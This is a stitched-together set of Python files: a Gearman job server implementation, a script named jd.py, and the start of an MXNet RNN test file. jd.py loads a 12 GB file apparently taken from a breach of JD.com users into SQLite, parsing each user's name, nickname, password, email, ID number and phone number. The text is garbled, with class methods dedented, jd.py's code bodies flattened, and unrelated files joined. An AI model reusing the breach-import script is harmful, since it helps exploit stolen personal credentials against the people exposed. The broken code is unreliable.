    edge_bitmask = select.EPOLLET
    error_bitmask = (select.EPOLLERR | select.EPOLLHUP | edge_bitmask)
    read_bitmask = (select.EPOLLIN | error_bitmask)
    readwrite_bitmask = (select.EPOLLOUT | read_bitmask)

    def __init__(self, port=4730, ssl_key=None, ssl_cert=None, ssl_ca=None,
                 statsd_host=None, statsd_port=8125, statsd_prefix=None,
                 server_id=None, acl=None, host=None, keepalive=False,
                 tcp_keepidle=7200, tcp_keepintvl=75, tcp_keepcnt=9):
        self.port = port
        self.ssl_key = ssl_key
        self.ssl_cert = ssl_cert
        self.ssl_ca = ssl_ca
        # Three priority queues of pending jobs (see getQueue()).
        self.high_queue = []
        self.normal_queue = []
        self.low_queue = []
        # All known jobs by handle (both queued and running).
        self.jobs = {}
        self.running_jobs = 0
        self.waiting_jobs = 0
        self.total_jobs = 0
        # Every function name registered by any worker.
        self.functions = set()
        # Monotonic counter used to build unique job handles.
        self.max_handle = 0
        self.acl = acl
        # Pipe used to wake connectLoop() on shutdown.
        self.connect_wake_read, self.connect_wake_write = os.pipe()
        self.poll = select.epoll()
        # Reverse mapping of fd -> connection
        self.connection_map = {}
        self.use_ssl = False
        if all([self.ssl_key, self.ssl_cert, self.ssl_ca]):
            self.use_ssl = True
        # Get all valid passive listen addresses, then sort by family to
        # prefer ipv6 if available.
        addrs = socket.getaddrinfo(host, self.port, socket.AF_UNSPEC,
                                   socket.SOCK_STREAM, 0,
                                   socket.AI_PASSIVE |
                                   socket.AI_ADDRCONFIG)
        addrs.sort(key=lambda addr: addr[0], reverse=True)
        for res in addrs:
            af, socktype, proto, canonname, sa = res
            try:
                self.socket = socket.socket(af, socktype, proto)
                self.socket.setsockopt(socket.SOL_SOCKET,
                                       socket.SO_REUSEADDR, 1)
                if keepalive and hasattr(socket, 'TCP_KEEPIDLE'):
                    self.socket.setsockopt(socket.SOL_SOCKET,
                                           socket.SO_KEEPALIVE, 1)
                    self.socket.setsockopt(socket.IPPROTO_TCP,
                                           socket.TCP_KEEPIDLE, tcp_keepidle)
                    self.socket.setsockopt(socket.IPPROTO_TCP,
                                           socket.TCP_KEEPINTVL, tcp_keepintvl)
                    self.socket.setsockopt(socket.IPPROTO_TCP,
                                           socket.TCP_KEEPCNT, tcp_keepcnt)
                elif keepalive:
                    # NOTE(review): self.log is only assigned further
                    # down (after super().__init__()), so reaching this
                    # branch looks like it would raise AttributeError —
                    # confirm.
                    self.log.warning('Keepalive requested but not available '
                                     'on this platform')
            except socket.error:
                self.socket = None
                continue
            try:
                self.socket.bind(sa)
                self.socket.listen(1)
            except socket.error:
                self.socket.close()
                self.socket = None
                continue
            break
        if self.socket is None:
            raise Exception("Could not open socket")
        if port == 0:
            # Ephemeral port requested: record the port actually bound.
            self.port = self.socket.getsockname()[1]
        super(Server, self).__init__(server_id)
        # Register the wake pipe so that we can break if we need to
        # reconfigure connections
        self.poll.register(self.wake_read, self.read_bitmask)
        if server_id:
            self.log = logging.getLogger("gear.Server.%s" % (self.client_id,))
        else:
            self.log = logging.getLogger("gear.Server")
        if statsd_host:
            if not statsd:
                self.log.error("Unable to import statsd module")
                self.statsd = None
            else:
                self.statsd = statsd.StatsClient(statsd_host,
                                                 statsd_port,
                                                 statsd_prefix)
        else:
            self.statsd = None
def _doConnectLoop(self):
    # Outer run method of the accept thread: keep connectLoop() alive,
    # backing off one second after any unexpected error.
    while self.running:
        try:
            self.connectLoop()
        except Exception:
            self.log.exception("Exception in connect loop:")
            time.sleep(1)

def connectLoop(self):
    """Accept incoming connections until the server is shut down."""
    poll = select.poll()
    bitmask = (select.POLLIN | select.POLLERR |
               select.POLLHUP | select.POLLNVAL)
    # Register the wake pipe so that we can break if we need to
    # shutdown.
    poll.register(self.connect_wake_read, bitmask)
    poll.register(self.socket.fileno(), bitmask)
    while self.running:
        ret = poll.poll()
        for fd, event in ret:
            if fd == self.connect_wake_read:
                self.log.debug("Accept woken by pipe")
                # Drain the pipe up to the newline written by _shutdown().
                while True:
                    if os.read(self.connect_wake_read, 1) == b'\n':
                        break
                return
            if event & select.POLLIN:
                self.log.debug("Accepting new connection")
                c, addr = self.socket.accept()
                if self.use_ssl:
                    # Wrap the accepted socket; client certs are required.
                    context = ssl.SSLContext(best_tls_version())
                    context.verify_mode = ssl.CERT_REQUIRED
                    context.load_cert_chain(self.ssl_cert, self.ssl_key)
                    context.load_verify_locations(self.ssl_ca)
                    c = context.wrap_socket(c, server_side=True)
                conn = ServerConnection(addr, c, self.use_ssl,
                                        self.client_id)
                self.log.info("Accepted connection %s" % (conn,))
                self.connections_condition.acquire()
                try:
                    self.active_connections.append(conn)
                    self._registerConnection(conn)
                    self.connections_condition.notifyAll()
                finally:
                    self.connections_condition.release()
def readFromConnection(self, conn):
    # Drain the connection completely: with edge-triggered epoll we
    # will not be notified again for data that is already buffered.
    while True:
        self.log.debug("Processing input on %s" % conn)
        try:
            p = conn.readPacket()
        except RetryIOError:
            # Read operation would block, we're done until
            # epoll flags this connection again
            return
        if p:
            if isinstance(p, Packet):
                self.handlePacket(p)
            else:
                self.handleAdminRequest(p)
        else:
            # An empty read means the peer closed the socket.
            self.log.debug("Received no data on %s" % conn)
            raise DisconnectError()

def writeToConnection(self, conn):
    # Flush any queued outbound data for this connection.
    self.log.debug("Processing output on %s" % conn)
    conn.sendQueuedData()

def _processPollEvent(self, conn, event):
    # This should do whatever is necessary to process a connection
    # that has triggered a poll event.  It should generally not
    # raise exceptions so as to avoid restarting the poll loop.
    # The exception handlers here can raise exceptions and if they
    # do, it's okay, the poll loop will be restarted.
    try:
        if event & (select.EPOLLERR | select.EPOLLHUP):
            self.log.debug("Received error event on %s: %s" % (
                conn, event))
            raise DisconnectError()
        if event & (select.POLLIN | select.POLLOUT):
            self.readFromConnection(conn)
            self.writeToConnection(conn)
    except socket.error as e:
        if e.errno == errno.ECONNRESET:
            self.log.debug("Connection reset by peer: %s" % (conn,))
            self._lostConnection(conn)
            return
        raise
    except DisconnectError:
        # Our inner method says we should quietly drop
        # this connection
        self._lostConnection(conn)
        return
    except Exception:
        self.log.exception("Exception reading or writing "
                           "from %s:" % (conn,))
        self._lostConnection(conn)
        return

def _flushAllConnections(self):
    # If we need to restart the poll loop, we need to make sure
    # there are no pending data on any connection.  Simulate poll
    # in+out events on every connection.
    #
    # If this method raises an exception, the poll loop will
    # restart again.
    #
    # No need to get the lock since this is called within the poll
    # loop and therefore the list is guaranteed never to shrink.
    connections = self.active_connections[:]
    for conn in connections:
        self._processPollEvent(conn, select.POLLIN | select.POLLOUT)
def _doPollLoop(self):
    # Outer run method of poll thread.
    while self.running:
        try:
            self._pollLoop()
        except Exception:
            self.log.exception("Exception in poll loop:")

def _pollLoop(self):
    # Inner method of poll loop.
    self.log.debug("Preparing to poll")
    # Ensure there are no pending data.
    self._flushAllConnections()
    while self.running:
        self.log.debug("Polling %s connections" %
                       len(self.active_connections))
        ret = self.poll.poll()
        # Since we're using edge-triggering, we need to make sure
        # that every file descriptor in 'ret' is processed.
        for fd, event in ret:
            if fd == self.wake_read:
                # This means we're exiting, so we can ignore the
                # rest of 'ret'.
                self.log.debug("Woken by pipe")
                # Drain the pipe up to the newline written on shutdown.
                while True:
                    if os.read(self.wake_read, 1) == b'\n':
                        break
                return
            # In the unlikely event this raises an exception, the
            # loop will be restarted.
            conn = self.connection_map[fd]
            self._processPollEvent(conn, event)

def _shutdown(self):
    # Wake the accept thread so connectLoop() notices we are stopping.
    super(Server, self)._shutdown()
    os.write(self.connect_wake_write, b'1\n')

def _cleanup(self):
    # Release the listening socket and the shutdown wake pipe.
    super(Server, self)._cleanup()
    self.socket.close()
    os.close(self.connect_wake_read)
    os.close(self.connect_wake_write)

def _registerConnection(self, conn):
    # Register the connection with the poll object
    # Call while holding the connection condition
    self.log.debug("Registering %s" % conn)
    self.connection_map[conn.conn.fileno()] = conn
    self.poll.register(conn.conn.fileno(), self.readwrite_bitmask)

def _unregisterConnection(self, conn):
    # Unregister the connection with the poll object
    # Call while holding the connection condition
    self.log.debug("Unregistering %s" % conn)
    fd = conn.conn.fileno()
    if fd not in self.connection_map:
        return
    try:
        self.poll.unregister(fd)
    except KeyError:
        pass
    try:
        del self.connection_map[fd]
    except KeyError:
        pass
def _lostConnection(self, conn):
    # Called as soon as a connection is detected as faulty.
    self.log.info("Marking %s as disconnected" % conn)
    self.connections_condition.acquire()
    self._unregisterConnection(conn)
    try:
        # NOTE(notmorgan): In the loop below it is possible to change the
        # jobs list on the connection. In python 3 .values() is an iter not
        # a static list, meaning that a change will break the for loop
        # as the object being iterated on will have changed in size.
        jobs = list(conn.related_jobs.values())
        if conn in self.active_connections:
            self.active_connections.remove(conn)
    finally:
        self.connections_condition.notifyAll()
        self.connections_condition.release()
    for job in jobs:
        if job.worker_connection == conn:
            # the worker disconnected, alert the client
            try:
                p = Packet(constants.REQ, constants.WORK_FAIL, job.handle)
                if job.client_connection:
                    job.client_connection.sendPacket(p)
            except Exception:
                self.log.exception("Sending WORK_FAIL to client after "
                                   "worker disconnect failed:")
        self._removeJob(job)
    # Shut down and close the socket, tolerating sockets that are
    # already disconnected.
    try:
        conn.conn.shutdown(socket.SHUT_RDWR)
    except socket.error as e:
        if e.errno != errno.ENOTCONN:
            self.log.exception("Unable to shutdown socket "
                               "for connection %s" % (conn,))
    except Exception:
        self.log.exception("Unable to shutdown socket "
                           "for connection %s" % (conn,))
    try:
        conn.conn.close()
    except Exception:
        self.log.exception("Unable to close socket "
                           "for connection %s" % (conn,))
    self._updateStats()

def _removeJob(self, job, dequeue=True):
    # dequeue is tri-state: True, False, or a specific queue
    # Drop the job from all connection/job bookkeeping and adjust the
    # running/waiting counters.
    if job.client_connection:
        try:
            del job.client_connection.related_jobs[job.handle]
        except KeyError:
            pass
    if job.worker_connection:
        try:
            del job.worker_connection.related_jobs[job.handle]
        except KeyError:
            pass
    try:
        del self.jobs[job.handle]
    except KeyError:
        pass
    if dequeue is True:
        # Search all queues for the job
        try:
            self.high_queue.remove(job)
        except ValueError:
            pass
        try:
            self.normal_queue.remove(job)
        except ValueError:
            pass
        try:
            self.low_queue.remove(job)
        except ValueError:
            pass
    elif dequeue is not False:
        # A specific queue was supplied
        dequeue.remove(job)
    # If dequeue is false, no need to remove from any queue
    self.total_jobs -= 1
    if job.running:
        self.running_jobs -= 1
    else:
        self.waiting_jobs -= 1
def getQueue(self):
    """Returns a copy of all internal queues in a flattened form.

    :returns: The Gearman queue.
    :rtype: list of :py:class:`WorkerJob`.
    """
    ret = []
    for queue in [self.high_queue, self.normal_queue, self.low_queue]:
        ret += queue
    return ret

def handleAdminRequest(self, request):
    # Dispatch a text (non-binary) administrative command by prefix.
    # Unknown commands fall through without a response.
    self.log.info("Received admin request %s" % (request,))
    if request.command.startswith(b'cancel job'):
        self.handleCancelJob(request)
    elif request.command.startswith(b'status'):
        self.handleStatus(request)
    elif request.command.startswith(b'workers'):
        self.handleWorkers(request)
    elif request.command.startswith(b'acl list'):
        self.handleACLList(request)
    elif request.command.startswith(b'acl grant'):
        self.handleACLGrant(request)
    elif request.command.startswith(b'acl revoke'):
        self.handleACLRevoke(request)
    elif request.command.startswith(b'acl self-revoke'):
        self.handleACLSelfRevoke(request)
    self.log.debug("Finished handling admin request %s" % (request,))

def _cancelJob(self, request, job, queue):
    # Remove a queued job for an admin "cancel job" request, applying
    # ACL checks first.
    if self.acl:
        if not self.acl.canInvoke(request.connection.ssl_subject,
                                  job.name):
            self.log.info("Rejecting cancel job from %s for %s "
                          "due to ACL" %
                          (request.connection.ssl_subject, job.name))
            request.connection.sendRaw(b'ERR PERMISSION_DENIED\n')
            return
    self._removeJob(job, dequeue=queue)
    self._updateStats()
    request.connection.sendRaw(b'OK\n')
    return

def handleCancelJob(self, request):
    words = request.command.split()
    handle = words[2]
    # Only jobs still sitting in a queue (not running) can be found
    # and cancelled here; anything else reports UNKNOWN_JOB.
    if handle in self.jobs:
        for queue in [self.high_queue, self.normal_queue, self.low_queue]:
            for job in queue:
                if handle == job.handle:
                    return self._cancelJob(request, job, queue)
    request.connection.sendRaw(b'ERR UNKNOWN_JOB\n')
def handleACLList(self, request):
    # "acl list": dump all ACL entries, terminated by ".".
    if self.acl is None:
        request.connection.sendRaw(b'ERR ACL_DISABLED\n')
        return
    for entry in self.acl.getEntries():
        l = "%s\tregister=%s\tinvoke=%s\tgrant=%s\n" % (
            entry.subject, entry.register, entry.invoke, entry.grant)
        request.connection.sendRaw(l.encode('utf8'))
    request.connection.sendRaw(b'.\n')

def handleACLGrant(self, request):
    # acl grant register worker .*
    # NOTE(review): request.command is bytes, so verb/subject are bytes;
    # comparing verb to str literals below can never be true on
    # Python 3 — verify intended behavior against the admin protocol.
    words = request.command.split(None, 4)
    verb = words[2]
    subject = words[3]
    if self.acl is None:
        request.connection.sendRaw(b'ERR ACL_DISABLED\n')
        return
    if not self.acl.canGrant(request.connection.ssl_subject):
        request.connection.sendRaw(b'ERR PERMISSION_DENIED\n')
        return
    try:
        if verb == 'invoke':
            self.acl.grantInvoke(subject, words[4])
        elif verb == 'register':
            self.acl.grantRegister(subject, words[4])
        elif verb == 'grant':
            self.acl.grantGrant(subject)
        else:
            request.connection.sendRaw(b'ERR UNKNOWN_ACL_VERB\n')
            return
    except ACLError as e:
        self.log.info("Error in grant command: %s" % (e.message,))
        request.connection.sendRaw(b'ERR UNABLE %s\n' % (e.message,))
        return
    request.connection.sendRaw(b'OK\n')

def handleACLRevoke(self, request):
    # acl revoke register worker
    # A subject may always revoke its own permissions; revoking another
    # subject requires grant permission.
    words = request.command.split()
    verb = words[2]
    subject = words[3]
    if self.acl is None:
        request.connection.sendRaw(b'ERR ACL_DISABLED\n')
        return
    if subject != request.connection.ssl_subject:
        if not self.acl.canGrant(request.connection.ssl_subject):
            request.connection.sendRaw(b'ERR PERMISSION_DENIED\n')
            return
    try:
        if verb == 'invoke':
            self.acl.revokeInvoke(subject)
        elif verb == 'register':
            self.acl.revokeRegister(subject)
        elif verb == 'grant':
            self.acl.revokeGrant(subject)
        elif verb == 'all':
            try:
                self.acl.remove(subject)
            except ACLError:
                pass
        else:
            request.connection.sendRaw(b'ERR UNKNOWN_ACL_VERB\n')
            return
    except ACLError as e:
        self.log.info("Error in revoke command: %s" % (e.message,))
        request.connection.sendRaw(b'ERR UNABLE %s\n' % (e.message,))
        return
    request.connection.sendRaw(b'OK\n')

def handleACLSelfRevoke(self, request):
    # acl self-revoke register
    # Like handleACLRevoke but always acts on the requester itself.
    words = request.command.split()
    verb = words[2]
    if self.acl is None:
        request.connection.sendRaw(b'ERR ACL_DISABLED\n')
        return
    subject = request.connection.ssl_subject
    try:
        if verb == 'invoke':
            self.acl.revokeInvoke(subject)
        elif verb == 'register':
            self.acl.revokeRegister(subject)
        elif verb == 'grant':
            self.acl.revokeGrant(subject)
        elif verb == 'all':
            try:
                self.acl.remove(subject)
            except ACLError:
                pass
        else:
            request.connection.sendRaw(b'ERR UNKNOWN_ACL_VERB\n')
            return
    except ACLError as e:
        self.log.info("Error in self-revoke command: %s" % (e.message,))
        request.connection.sendRaw(b'ERR UNABLE %s\n' % (e.message,))
        return
    request.connection.sendRaw(b'OK\n')
def _getFunctionStats(self):
    # Build {function_name: [total_jobs, running_jobs, workers]} from
    # the job table and the registered connections.
    functions = {}
    for function in self.functions:
        # Total, running, workers
        functions[function] = [0, 0, 0]
    for job in self.jobs.values():
        if job.name not in functions:
            functions[job.name] = [0, 0, 0]
        functions[job.name][0] += 1
        if job.running:
            functions[job.name][1] += 1
    for connection in self.active_connections:
        for function in connection.functions:
            if function not in functions:
                functions[function] = [0, 0, 0]
            functions[function][2] += 1
    return functions

def handleStatus(self, request):
    # "status" admin command: one tab-separated line per function,
    # terminated by ".".
    functions = self._getFunctionStats()
    for name, values in functions.items():
        request.connection.sendRaw(
            ("%s\t%s\t%s\t%s\n" %
             (name.decode('utf-8'), values[0], values[1],
              values[2])).encode('utf8'))
    request.connection.sendRaw(b'.\n')

def handleWorkers(self, request):
    # "workers" admin command: fd, ip, client id and registered
    # functions per connection, terminated by ".".
    for connection in self.active_connections:
        fd = connection.conn.fileno()
        ip = connection.host
        client_id = connection.client_id or b'-'
        functions = b' '.join(connection.functions).decode('utf8')
        request.connection.sendRaw(("%s %s %s : %s\n" %
                                    (fd, ip, client_id.decode('utf8'),
                                     functions))
                                   .encode('utf8'))
    request.connection.sendRaw(b'.\n')
def wakeConnection(self, connection):
    # Send NOOP to one sleeping worker so it asks for a job.
    p = Packet(constants.RES, constants.NOOP, b'')
    if connection.state == 'SLEEP':
        connection.changeState("AWAKE")
        connection.sendPacket(p)

def wakeConnections(self, job=None):
    # Send NOOP to all sleeping workers, or — when a job is given —
    # only to those registered for that job's function.
    p = Packet(constants.RES, constants.NOOP, b'')
    # Use a randomized copy of active_connections to try
    # to spread workload across the machines that workers are on.
    conns = self.active_connections[:]
    random.shuffle(conns)  # Modifies the list
    for connection in conns:
        if connection.state == 'SLEEP':
            if ((job and job.name in connection.functions) or
                    (job is None)):
                connection.changeState("AWAKE")
                connection.sendPacket(p)

def reportTimingStats(self, ptype, duration):
    """Report processing times by packet type

    This method is called by handlePacket to report how long
    processing took for each packet.  If statsd is configured,
    timing and counts are reported with the key
    "prefix.packet.NAME".

    :arg bytes ptype: The packet type (one of the packet types in
        constants).
    :arg float duration: The time (in seconds) it took to process
        the packet.
    """
    if not self.statsd:
        return
    ptype = constants.types.get(ptype, 'UNKNOWN')
    key = 'packet.%s' % ptype
    self.statsd.timing(key, int(duration * 1000))
    self.statsd.incr(key)

def _updateStats(self):
    # Push the current queue gauges to statsd (no-op when disabled).
    if not self.statsd:
        return
    # prefix.queue.total
    # prefix.queue.running
    # prefix.queue.waiting
    self.statsd.gauge('queue.total', self.total_jobs)
    self.statsd.gauge('queue.running', self.running_jobs)
    self.statsd.gauge('queue.waiting', self.waiting_jobs)
def _handleSubmitJob(self, packet, precedence, background=False):
    # Common implementation behind all SUBMIT_JOB* packets: ACL check,
    # handle allocation, queueing and worker wakeup.
    name = packet.getArgument(0)
    unique = packet.getArgument(1)
    if not unique:
        unique = None
    arguments = packet.getArgument(2, True)
    if self.acl:
        if not self.acl.canInvoke(packet.connection.ssl_subject, name):
            self.log.info("Rejecting SUBMIT_JOB from %s for %s "
                          "due to ACL" %
                          (packet.connection.ssl_subject, name))
            self.sendError(packet.connection, 0,
                           'Permission denied by ACL')
            return
    self.max_handle += 1
    handle = ('H:%s:%s' % (packet.connection.host,
                           self.max_handle)).encode('utf8')
    if not background:
        conn = packet.connection
    else:
        # Background jobs have no client connection to report back to.
        conn = None
    job = ServerJob(handle, name, arguments, conn, unique)
    p = Packet(constants.RES, constants.JOB_CREATED, handle)
    packet.connection.sendPacket(p)
    self.jobs[handle] = job
    self.total_jobs += 1
    self.waiting_jobs += 1
    if not background:
        packet.connection.related_jobs[handle] = job
    if precedence == PRECEDENCE_HIGH:
        self.high_queue.append(job)
    elif precedence == PRECEDENCE_NORMAL:
        self.normal_queue.append(job)
    elif precedence == PRECEDENCE_LOW:
        self.low_queue.append(job)
    self._updateStats()
    self.wakeConnections(job)

# Thin wrappers mapping each SUBMIT_JOB* packet type onto
# _handleSubmitJob with the right precedence/background flags.
def handleSubmitJob(self, packet):
    return self._handleSubmitJob(packet, PRECEDENCE_NORMAL)

def handleSubmitJobHigh(self, packet):
    return self._handleSubmitJob(packet, PRECEDENCE_HIGH)

def handleSubmitJobLow(self, packet):
    return self._handleSubmitJob(packet, PRECEDENCE_LOW)

def handleSubmitJobBg(self, packet):
    return self._handleSubmitJob(packet, PRECEDENCE_NORMAL,
                                 background=True)

def handleSubmitJobHighBg(self, packet):
    return self._handleSubmitJob(packet, PRECEDENCE_HIGH, background=True)

def handleSubmitJobLowBg(self, packet):
    return self._handleSubmitJob(packet, PRECEDENCE_LOW, background=True)
def getJobForConnection(self, connection, peek=False):
    # Return the next queued job this worker can run, highest priority
    # queue first; with peek=True only report whether one exists
    # without dequeueing or changing any state.
    for queue in [self.high_queue, self.normal_queue, self.low_queue]:
        for job in queue:
            if job.name in connection.functions:
                if not peek:
                    queue.remove(job)
                    connection.related_jobs[job.handle] = job
                    job.worker_connection = connection
                    job.running = True
                    self.waiting_jobs -= 1
                    self.running_jobs += 1
                    self._updateStats()
                return job
    return None

def handleGrabJobUniq(self, packet):
    # Worker asked for work: assign a job or reply NO_JOB.
    job = self.getJobForConnection(packet.connection)
    if job:
        self.sendJobAssignUniq(packet.connection, job)
    else:
        self.sendNoJob(packet.connection)

def sendJobAssignUniq(self, connection, job):
    # JOB_ASSIGN_UNIQ payload: handle, name, unique and arguments
    # joined by NUL bytes.
    unique = job.binary_unique
    if not unique:
        unique = b''
    data = b'\x00'.join((job.handle, job.name, unique, job.arguments))
    p = Packet(constants.RES, constants.JOB_ASSIGN_UNIQ, data)
    connection.sendPacket(p)

def sendNoJob(self, connection):
    p = Packet(constants.RES, constants.NO_JOB, b'')
    connection.sendPacket(p)

def handlePreSleep(self, packet):
    # Worker is going idle; wake it right away if work is already
    # queued for one of its functions.
    packet.connection.changeState("SLEEP")
    if self.getJobForConnection(packet.connection, peek=True):
        self.wakeConnection(packet.connection)
# WORK_COMPLETE/FAIL/EXCEPTION end the job; DATA/WARNING/STATUS are
# forwarded while the job keeps running.
def handleWorkComplete(self, packet):
    self.handlePassthrough(packet, True)

def handleWorkFail(self, packet):
    self.handlePassthrough(packet, True)

def handleWorkException(self, packet):
    self.handlePassthrough(packet, True)

def handleWorkData(self, packet):
    self.handlePassthrough(packet)

def handleWorkWarning(self, packet):
    self.handlePassthrough(packet)

def handleWorkStatus(self, packet):
    # Record the reported completion ratio, then forward to the client.
    handle = packet.getArgument(0)
    job = self.jobs.get(handle)
    if not job:
        self.log.info("Received packet %s for unknown job" % (packet,))
        return
    job.numerator = packet.getArgument(1)
    job.denominator = packet.getArgument(2)
    self.handlePassthrough(packet)

def handlePassthrough(self, packet, finished=False):
    # Relay a worker packet to the submitting client (if any),
    # rewriting its code as a response packet.
    handle = packet.getArgument(0)
    job = self.jobs.get(handle)
    if not job:
        self.log.info("Received packet %s for unknown job" % (packet,))
        return
    packet.code = constants.RES
    if job.client_connection:
        job.client_connection.sendPacket(packet)
    if finished:
        # Already dequeued when it was assigned, hence dequeue=False.
        self._removeJob(job, dequeue=False)
    self._updateStats()
def handleSetClientID(self, packet):
    # Remote announced its client id (bytes).
    name = packet.getArgument(0)
    packet.connection.client_id = name

def sendError(self, connection, code, text):
    # ERROR response payload: NUL-terminated code and text.
    data = (str(code).encode('utf8') + b'\x00' +
            str(text).encode('utf8') + b'\x00')
    p = Packet(constants.RES, constants.ERROR, data)
    connection.sendPacket(p)

def handleCanDo(self, packet):
    # Worker registers a function it can perform.
    name = packet.getArgument(0)
    if self.acl:
        if not self.acl.canRegister(packet.connection.ssl_subject, name):
            self.log.info("Ignoring CAN_DO from %s for %s due to ACL" %
                          (packet.connection.ssl_subject, name))
            # CAN_DO normally does not merit a response so it is
            # not clear that it is appropriate to send an ERROR
            # response at this point.
            return
    self.log.debug("Adding function %s to %s" % (name, packet.connection))
    packet.connection.functions.add(name)
    self.functions.add(name)

def handleCantDo(self, packet):
    # Worker unregisters a single function.
    name = packet.getArgument(0)
    self.log.debug("Removing function %s from %s" %
                   (name, packet.connection))
    packet.connection.functions.remove(name)

def handleResetAbilities(self, packet):
    # Worker unregisters all of its functions.
    self.log.debug("Resetting functions for %s" % packet.connection)
    packet.connection.functions = set()

def handleGetStatus(self, packet):
    # STATUS_RES payload: handle, known, running, numerator,
    # denominator, joined by NUL bytes.
    handle = packet.getArgument(0)
    self.log.debug("Getting status for %s" % handle)
    known = 0
    running = 0
    numerator = b''
    denominator = b''
    job = self.jobs.get(handle)
    if job:
        known = 1
        if job.running:
            running = 1
        numerator = job.numerator or b''
        denominator = job.denominator or b''
    data = (handle + b'\x00' +
            str(known).encode('utf8') + b'\x00' +
            str(running).encode('utf8') + b'\x00' +
            numerator + b'\x00' +
            denominator)
    p = Packet(constants.RES, constants.STATUS_RES, data)
    packet.connection.sendPacket(p)
|
jd.py | import logging
import sqlite3
import threading
import time
class Converter(object):
    """Load a '---'-separated text dump into the SQLite table ``jd``."""

    def __init__(self, database_path, file_path):
        # NOTE(review): configuring the root logger in a constructor
        # affects the whole process; consider moving this to the script
        # entry point.
        logging.basicConfig(
            level=logging.DEBUG,
            format="%(asctime)s %(levelname)s %(message)s",
            datefmt='%Y-%m-%d %H:%M:%S',
        )
        self.logger = logging.getLogger()
        self.database_connection = None  # set by connect_database()
        self.database_path = database_path  # SQLite file to write into
        self.file_path = file_path  # source text file to read
        self.file_rows = 0  # total lines in the source file
        self.handle_total = 0  # lines handled so far
        self.handle_invalid = 0  # malformed or duplicate lines
        self.handle_queue = 0  # inserts since the last commit
        self.cancel_print_insertion_speed = None  # stops the reporter thread
def connect_database(self):
    """Open the SQLite connection (must precede insert()/start())."""
    self.database_connection = sqlite3.connect(self.database_path)

def close_database(self):
    """Close the SQLite connection."""
    self.database_connection.close()
def insert(self, id, name, nickname, password, email, id_number, phone_number):
cursor = self.database_connection.cursor()
try:
cursor.execute(
"INSERT INTO jd VALUES (?, ?, ?, ?, ?, ?, ?);",
(id, name, nickname, password, email, id_number, phone_number)
)
except sqlite3.IntegrityError:
self.handle_invalid += 1
finally:
self.handle_total += 1
self.handle_queue += 1
pass
def start_insertion_speed(self):
event = threading.Event()
def print_insertion_speed():
handle_total = self.handle_total
while not event.wait(1):
if self.handle_total - handle_total == 0:
continue
self.logger.info("{}/s, {}/{} progress, {} rows are invalid, {} seconds left".format(
self.handle_total - handle_total,
self.handle_total,
self.file_rows,
self.handle_invalid,
(self.file_rows - self.handle_total) / (self.handle_total - handle_total),
))
handle_total = self.handle_total
threading.Thread(target=print_insertion_speed).start()
return event.set
def start(self):
# Get the number of file rows
self.logger.info("start scanning file lines")
start_time = time.time()
with open(self.file_path) as file:
self.file_rows = 0
for _ in file:
self.file_rows += 1
end_time = time.time()
self.logger.info("scan completed, there are a total of {} lines, and it taken {} seconds".format(
self.file_rows,
end_time - start_time,
))
# Insert QQ and phone numbers
self.connect_database()
self.cancel_print_insertion_speed = self.start_insertion_speed()
with open(self.file_path) as file:
for line in file:
try:
dataset = line.strip().split("---")
name = dataset[0]
nickname = dataset[1]
password = dataset[2]
email = dataset[3]
id_number = dataset[4]
phone_number = dataset[5]
except IndexError:
self.handle_invalid += 1
pass
finally:
self.handle_total += 1
self.insert(self.handle_total, name, nickname, password, email, id_number, phone_number)
if self.handle_queue >= 400000:
self.database_connection.commit()
self.handle_queue = 0
self.database_connection.commit()
self.cancel_print_insertion_speed()
self.close_database()
self.logger.info("completed, insert {} rows, {} rows of invalid data".format(
self.handle_total,
self.handle_invalid,
))
exit()
if __name__ == '__main__':
    # Import the dump at www_jd_com_12g.txt into database/database.db.
    # NOTE(review): both paths are hard-coded relative to the working
    # directory; the jd table must already exist in the database file.
    converter = Converter("database/database.db", "www_jd_com_12g.txt")
    converter.start()
|
test_operator.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
    """Check that two RNN cell implementations produce matching results.

    Both cells are unrolled over the same (N, T, I) input in NTC layout,
    cell1's parameters are transplanted into cell2, and the forward outputs
    (inference and training modes) plus the input gradients are asserted to
    agree within rtol/atol.

    T/N/I/H are sequence length, batch size, input size and hidden size;
    grad_req is the gradient request mode ('write', 'add' or 'null').
    """
    dshape = (N, T, I)
    data = mx.sym.Variable('data')

    Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
    mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
    mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)

    Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
    mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
    mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)

    # Share parameters: unpack from cell1's weight layout, repack into cell2's.
    mod1.init_params()
    args, auxs = mod1.get_params()
    args = cell1.unpack_weights(args)
    args = cell2.pack_weights(args)
    mod2.set_params(args, auxs)

    x = mx.random.uniform(shape=dshape)
    batch=mx.io.DataBatch(data=[x])
    # check inference
    mod1.forward(batch, is_train=False)
    mod2.forward(batch, is_train=False)
    assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)

    # check training
    mod1.forward(batch, is_train=True)
    mod2.forward(batch, is_train=True)
    assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)

